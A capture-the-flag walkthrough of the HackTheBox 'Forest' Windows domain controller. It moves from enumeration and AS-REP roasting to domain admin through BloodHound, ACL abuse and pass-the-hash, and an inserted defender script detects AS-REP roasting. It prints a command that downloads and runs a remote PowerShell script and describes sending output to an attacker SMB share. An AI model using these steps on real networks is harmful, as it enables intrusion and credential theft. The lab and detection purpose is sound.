HackTheBox Forest

Easy Windows box (more like medium)

Starting off with Nmap

From the output, we can tell that a domain controller is being hosted here, as well as SMB.

SMB Enumeration:

smbmap

Unable to access the SMB shares; also tried with null authentication (fake user/pass).

Trying with smbclient

No luck either, but we see that anonymous access is supported.

enum4linux

No luck here.

RPC enumeration

Connecting with null auth

Creating a list of usable usernames

Cleaning up the output

AS-REP roasting

Using a simple for loop we can automate going through the user list, and we finally get a hit on an svc account (AS-REP roasting).
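Added defender-side example, not code from the original writeup: a check that flags the footprint this step leaves on the domain controller. It assumes 4768 events have already been parsed into flat fields (the records below are constructed; account names and IPs are made up).

```python
"""Flag AS-REP roasting in exported Windows Security log events (4768).

AS-REP roasting only works against accounts that have Kerberos
pre-authentication disabled. On the domain controller each such request
is logged as event 4768 (TGT requested) with Pre-Authentication Type 0,
and roasting tools ask for RC4 (Ticket Encryption Type 0x17) so the
reply is crackable offline. A successful 4768 with that combination is
the signal to alert on.
"""
from collections import defaultdict

# Constructed sample records (assumption: the XML events have already been
# flattened to these fields by a SIEM or a wevtutil/PowerShell export).
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.25", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "svc-example", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.99", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "bob", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.25", "Status": "0x0"},
    # Pre-auth type 0 but the KDC rejected it (0x6 = client principal unknown).
    {"EventID": 4768, "TargetUserName": "nosuchuser", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.99", "Status": "0x6"},
    # Service ticket request (4769) is a different event and out of scope here.
    {"EventID": 4769, "TargetUserName": "svc-example", "PreAuthType": "-",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.99", "Status": "0x0"},
]


def is_asrep_roast(event):
    """True for a TGT issued successfully with no pre-auth and RC4 encryption."""
    return (event.get("EventID") == 4768
            and event.get("PreAuthType") == "0"
            and event.get("TicketEncryptionType") == "0x17"
            and event.get("Status") == "0x0")


def find_asrep_roasting(events):
    """Map each requesting IP to the sorted list of accounts it roasted."""
    hits = defaultdict(set)
    for ev in events:
        if is_asrep_roast(ev):
            hits[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: sorted(users) for ip, users in hits.items()}


if __name__ == "__main__":
    for ip, users in find_asrep_roasting(SAMPLE_EVENTS).items():
        print(f"{ip} obtained AS-REPs without pre-auth for: {', '.join(users)}")
```

The only accounts that can ever match are those with "Do not require Kerberos preauthentication" set, so the fix is to clear that flag on each flagged account, or to give it a long random password where the flag cannot be cleared.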

Hash Cracking

We can now use hashcat to crack the hash.

We got the password.

We can then use evil-winrm to get access to the machine as a user and cat the user flag.

Privilege escalation

To get a better understanding of what's going on I deployed SharpHound, the PowerShell collector script from the BloodHound repo, which runs a batch of automated queries for recon.

First I started a local web server and then downloaded the PowerShell script using iex:

iex (New-Object Net.WebClient).DownloadString("http://10.10.14.6/SharpHound.ps1")

Then I invoked the script with valid credentials so the queries could be made:

We are then left with the issue of exfiltrating the output back to our machine.

Data Exfiltration

Using Impacket's smbserver I started an SMB server to exfiltrate my output to.

Thanks to 0xdf's writeup for this.

Inside my evil-winrm shell I authenticated to my SMB server.

I then copied my output file to the share.

Clean up:

Delete output file

del 0220807041638_BloodHound.zip

Delete share

net use /d \\10.10.14.10\share

BloodHound

Investigating the output with the BloodHound GUI

After uploading the data I queried the shortest path from my compromised account to high value targets:

Viewing the help option in BloodHound

Creating my user and adding it to the right groups

Evading Defender and downloading PowerView

Add-ObjectACL

Dump NTLM hashes for all domain users

psexec using the admin account's NTLM hash

Print the root flag